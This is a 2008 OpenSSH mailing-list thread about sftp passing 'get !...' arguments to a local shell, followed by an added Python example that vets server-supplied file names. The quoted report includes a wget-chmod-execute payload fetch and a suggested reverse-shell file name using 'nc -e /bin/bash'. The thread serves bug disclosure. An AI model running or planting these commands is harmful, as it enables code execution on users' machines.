Strange sftp input parameter handling, user assisted code execution?

Ben Lindstrom mouring at eviladmin.org
Wed Jun 18 03:29:11 EST 2008


I would consider that the use of "get !ls" would be a client-side bug in
escaping (I suspect it should be filed as a ticket in
bugzilla.mindrot.org). sftp should translate "get !ls" into either "get
\!ls" or into the quoted counterpart.

However, I'm not sure what this has to do with the server, since !
produces a local shell and has nothing to do with the remote server.

- Ben

On Tue, 17 Jun 2008, Roman Fiedler wrote:

> Hello list,
>
> I use openssh-client 1:4.7p1-8ubuntu1.2. After authentication:
>
> sftp> get !xxxx
> /bin/bash: xxxx: command not found
> Shell exited with status 127
>
>
> sftp> get !/bin/ls -al
> total 2132
> drwxr-xr-x  4 admin users   4096 2008-06-17 16:33 .
> drwxr-xr-x 16 admin users  12288 2008-06-17 08:50 ..
> drwxr-xr-x  3 admin users      8 2008-05-21 18:38 gd
>
>
> sftp> get !wget http://10.255.255.2:1234/root ; chmod 0755 root ; ./root
> --16:54:37--  http://10.255.255.2:1234/root
>            => `root'
> Connecting to 10.255.255.2:1234... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 123
>
> 100%[====================================>] 123           13.59B/s
> ETA 00:00
>
> 16:55:49 (7.08 B/s) - `root' saved [123/123]
>
> ./root: line 1: afdasfasf: command not found
> ./root: line 3: asdfa: command not found
> Shell exited with status 127
> sftp>
>
> On a Linux server I did not manage to create a file with a / in the
> name, but a manipulated server could return such filenames or other
> strategies do not need them, e.g.
> touch '!nc -e /bin/bash 10.255.255.2 1234' on the server side and trying
> to download is also a good one.
>
> Has someone observed this behavior?
> Is this just a strange thing but according to the specs or a bug?
>
> lg roman
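
The case raised in this thread, a server-supplied file name that begins with `!`, can be caught before any name is written into an sftp batch file. The following is an added example, not part of the original messages and not OpenSSH code; the function names, the allowlist and the `./` prefix are assumptions made for illustration.

```python
import re

# Assumed policy: only characters that need no quoting are accepted.
# Anything else is refused and reported instead of being escaped.
SAFE_NAME = re.compile(r"[A-Za-z0-9._+=@,-]+")


def vet_remote_name(name):
    """Return the reasons to refuse `name`; an empty list means it is accepted."""
    reasons = []
    if name.startswith("!"):
        reasons.append("leading '!' (sftp local shell escape)")
    if name.startswith("-"):
        reasons.append("leading '-' (looks like an option)")
    if "/" in name or name in (".", ".."):
        reasons.append("path separator or dot entry")
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in name):
        reasons.append("control character (could split the batch line)")
    if not reasons and not SAFE_NAME.fullmatch(name):
        reasons.append("character outside the allowlist")
    return reasons


def build_batch(names):
    """Split a remote listing into safe 'get' lines and refused names."""
    lines, refused = [], {}
    for name in names:
        reasons = vet_remote_name(name)
        if reasons:
            refused[name] = reasons
        else:
            # './' keeps the argument from ever starting with '!' or '-'.
            lines.append("get ./" + name)
    return lines, refused


# Constructed listing; the '!' entries reuse the strings typed in the report.
SAMPLE_LISTING = ["report.txt", "!xxxx", "!/bin/ls -al", "-r", "a\nget x", "gd"]

if __name__ == "__main__":
    batch, refused = build_batch(SAMPLE_LISTING)
    print("\n".join(batch))
    for name, why in refused.items():
        print("refused %r: %s" % (name, "; ".join(why)))
```

Refused names are worth logging: a listing full of entries that start with `!` is a signal about the server, not only a parsing nuisance.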

